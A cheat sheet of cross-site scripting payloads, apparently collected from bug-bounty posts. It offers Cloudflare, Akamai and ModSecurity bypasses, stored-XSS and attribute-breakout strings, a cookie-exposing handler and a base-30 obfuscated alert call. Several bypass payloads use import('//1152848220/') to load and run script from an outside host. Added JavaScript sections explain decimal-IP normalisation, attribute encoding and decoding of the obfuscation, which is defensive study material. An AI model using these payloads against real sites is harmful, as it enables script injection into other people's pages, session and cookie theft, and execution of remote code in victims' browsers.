Cross Site Scripting (XSS)
Payloads
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
<svg onload="alert(1)" <="" svg=""
GUYS bypassed Cloudflare using this payload
"><x/Onpointerrawupdate=confirm(document.cookie)>kira_deathnote
"><marquee/onstart=confirm(1)>
"onfocus="alert`1`"autofocus="
Useful #XSS Payloads -
"><block%quote oncontextmenu%3Dconfirm(1)>Right click me</blockquote><!--
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
XSS
<body ontouchstart=alert(1)>
Triggers when a finger touches the screen.
<body ontouchend=alert(1)>
Triggers when a finger is lifted from the touch screen.
<body ontouchmove=alert(1)>
Triggers when a finger is dragged across the screen.
These handlers only fire for touch input, so test them on a real device or with touch emulation in the browser devtools.
onerror=alert(1);//
" onfocus="alert(1)" autofocus="

<math><x xlink:href=javascript:confirm`1`>click

HTML INJECTION + XSS INJECTION

/<div+id=JavaScript>/<h1>_Y000!_

/<div+id=JavaScript>/<marquee>_Y000!_</marquee>

/<div+id=JavaScript>/<marquee onstart=alert`_Y000!_`>_Y000!_</marquee>

Cloudflare WAF Bypass
<img src=x onError=import('//1152848220/')>
Akamai WAF Bypass
<x onauxclick=import('//1152848220/')>click
Mod_Security WAF Bypass
<x onauxclick=import('//1152848220/')>click
#BugBounty #bugbountytip

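The three WAF-bypass payloads above point `import()` at `//1152848220/`, an IPv4 address written as one decimal number. A rule that matches on dotted addresses or hostnames does not recognise it, but the browser's URL parser does. The script below is an added example, not code from the page or from the people who posted the payloads: it converts between the two forms and shows that a WHATWG-compliant URL parser (Node's `URL` class) normalises the decimal host back to dotted form, which is what a filter should do before matching. The `https:` scheme is an assumption, since `//host/` is scheme-relative and `import()` resolves it against the page that runs it; the dotted address is computed here, not taken from the page.

```javascript
// Added example, not from the original page: decimal-IP hosts as used by
// import('//1152848220/') above.

// Dotted-quad IPv4 -> the single decimal integer a browser accepts as a host.
function ipv4ToDecimal(dotted) {
  const octets = dotted.split(".").map(Number);
  if (octets.length !== 4 ||
      octets.some((o) => !Number.isInteger(o) || o < 0 || o > 255)) {
    throw new Error(`not a dotted-quad IPv4 address: ${dotted}`);
  }
  // Multiply instead of shifting: 32-bit shifts go negative above 127.x.x.x.
  return octets[0] * 2 ** 24 + octets[1] * 2 ** 16 + octets[2] * 256 + octets[3];
}

// Decimal integer -> dotted quad (the form a WAF rule usually matches on).
function decimalToIpv4(n) {
  if (!Number.isInteger(n) || n < 0 || n > 0xffffffff) {
    throw new Error(`not a 32-bit value: ${n}`);
  }
  return [n >>> 24, (n >>> 16) & 255, (n >>> 8) & 255, n & 255].join(".");
}

// What the browser does with the payload: the WHATWG URL parser (also behind
// Node's URL class) treats a purely numeric host as an IPv4 number and
// serialises it dotted. The scheme is assumed; '//host/' is scheme-relative.
function normalizeHost(schemeRelativeUrl, scheme = "https:") {
  return new URL(scheme + schemeRelativeUrl).hostname;
}

// Defender side: normalise first, then match. A rule that only inspects the
// raw string sees "1152848220" and never the dotted address.
function hostMatches(rawUrl, blockedDotted) {
  return normalizeHost(rawUrl) === blockedDotted;
}

// Sample input constructed for this example from the number in the payloads above.
const PAYLOAD_HOST = "//1152848220/";
console.log(normalizeHost(PAYLOAD_HOST));                 // dotted form
console.log(ipv4ToDecimal(normalizeHost(PAYLOAD_HOST)));  // back to 1152848220
```

The same parser also accepts hex (`//0x44b7115c/`) and octal-per-octet forms, so normalising through `new URL()` before matching covers those variants as well.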
Some payloads that worked for me in popping up a stored XSS:

1. <img src=`xx:xx`onerror=alert(1)>
2. <div/onmouseover='alert(1)'> style="x:">
3. \";alert('XSS');//
4. "autofocus/onfocus=alert(1)//
5. '-alert(1)-'

Good luck!

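The attribute breakouts on this page (`"autofocus/onfocus=alert(1)//` in the list above, `" onfocus="alert(1)" autofocus="` and `"onfocus="alert`1`"autofocus="` earlier) only work because the application concatenates input into a quoted attribute without encoding it. The snippet below is an added example, not code from the page or its contributors: the same template rendered unsafely and then with attribute encoding, plus a rough check that counts event-handler attributes in the output. The payload strings are the ones from this page; the template, helper names and the check are assumptions made for the example.

```javascript
// Added example, not from the original page: why the attribute breakouts work
// and what closes them. Template and helper names are assumptions.

// Vulnerable: untrusted input concatenated straight into a double-quoted attribute.
function renderUnsafe(value) {
  return `<input name="q" value="${value}">`;
}

// Encode everything that can end the value or start a new attribute. Encoding
// the quote alone is enough for a quoted attribute, but encoding these keeps the
// output safe even if someone later drops the quotes from the template.
function encodeForHtmlAttribute(s) {
  return String(s).replace(/[&<>"'`=\/]/g, (c) => `&#${c.charCodeAt(0)};`);
}

function renderSafe(value) {
  return `<input name="q" value="${encodeForHtmlAttribute(value)}">`;
}

// Rough check for the demo: an event-handler attribute is "on<name>=" preceded
// by whitespace, a slash or a quote, all of which end the previous attribute for
// the HTML tokenizer. Not a parser; enough to show the difference.
function countEventHandlers(html) {
  return (html.match(/(?:^|[\s\/"'])on[a-z]+\s*=/gi) || []).length;
}

// Payloads from this page, used as constructed test input.
const BREAKOUTS = [
  '"autofocus/onfocus=alert(1)//',
  '" onfocus="alert(1)" autofocus="',
  '"onfocus="alert`1`"autofocus="',
];

// One count per payload for a given renderer.
function handlerCounts(render) {
  return BREAKOUTS.map((p) => countEventHandlers(render(p)));
}

console.log(handlerCounts(renderUnsafe)); // every payload injects a handler
console.log(handlerCounts(renderSafe));   // none survive encoding
```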
XSS payload + &NewLine;

<img src=`%00`&NewLine; onerror=alert`_Y000!_`&NewLine;

<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert`_Y000!_`&NewLine;>_Y000!_</a>

<img src="X" onerror=top[8680439..toString(30)](1337)>

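The `top[8680439..toString(30)](1337)` payload above spells `alert` without ever writing the word: `8680439` is `alert` read as a base-30 number, and `Number.prototype.toString(30)` recovers the string at runtime, so `top["alert"](1337)` runs. The double dot matters because `8680439.toString` would lex the first dot as a decimal point. The script below is an added example rather than code from the page: it computes such numbers for any lowercase identifier, picks the smallest usable radix (one more than the highest digit value in the word), and decodes a captured payload back, which is the quick way to read one in a log. Function names are my own.

```javascript
// Added example, not from the original page: the "N..toString(R)" obfuscation.

// Smallest radix in which every character of `word` is a valid digit.
// 'alert' contains 't' (value 29 in base 36), so it needs radix >= 30.
function minRadix(word) {
  if (!/^[0-9a-z]+$/.test(word)) {
    throw new Error(`"${word}" is not spellable with base-36 digits`);
  }
  let highest = 0;
  for (const ch of word) highest = Math.max(highest, parseInt(ch, 36));
  return Math.max(2, highest + 1);
}

// word -> { n, radix } such that n.toString(radix) === word.
function encodeWord(word, radix = minRadix(word)) {
  if (radix < minRadix(word) || radix > 36) {
    throw new Error(`radix ${radix} cannot spell "${word}"`);
  }
  const n = parseInt(word, radix);
  // Past Number.MAX_SAFE_INTEGER the round trip silently breaks, so verify it.
  if (n > Number.MAX_SAFE_INTEGER || n.toString(radix) !== word) {
    throw new Error(`"${word}" does not round-trip in radix ${radix}`);
  }
  return { n, radix };
}

// Build the handler body as in the payload above. The double dot is required:
// "8680439.toString" lexes the dot as a decimal point; "8680439..toString" is
// the numeric literal "8680439." followed by a property access.
function buildRadixCall(word, arg, radix) {
  const { n, radix: r } = encodeWord(word, radix);
  return `top[${n}..toString(${r})](${arg})`;
}

// Reverse direction: pull the function name out of a captured payload.
function decodeRadixCall(payload) {
  const m = /(\d+)\.\.toString\((\d+)\)/.exec(payload);
  return m ? Number(m[1]).toString(Number(m[2])) : null;
}

// Sample input constructed from the payload above.
const CAPTURED = '<img src="X" onerror=top[8680439..toString(30)](1337)>';
console.log(decodeRadixCall(CAPTURED));                      // alert
console.log(buildRadixCall("confirm", "document.domain"));   // radix 28 variant
```

Any radix from `minRadix(word)` up to 36 works, so the same word has several numeric spellings; a detection rule should decode the call rather than match on one constant.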
<input onfocus="alert('xss');" autofocus>

#BugBountyTip - Useful #XSS Payloads. Today I used this:
<a href="mailto:a"+/onmouseover=prompt(document.domain)>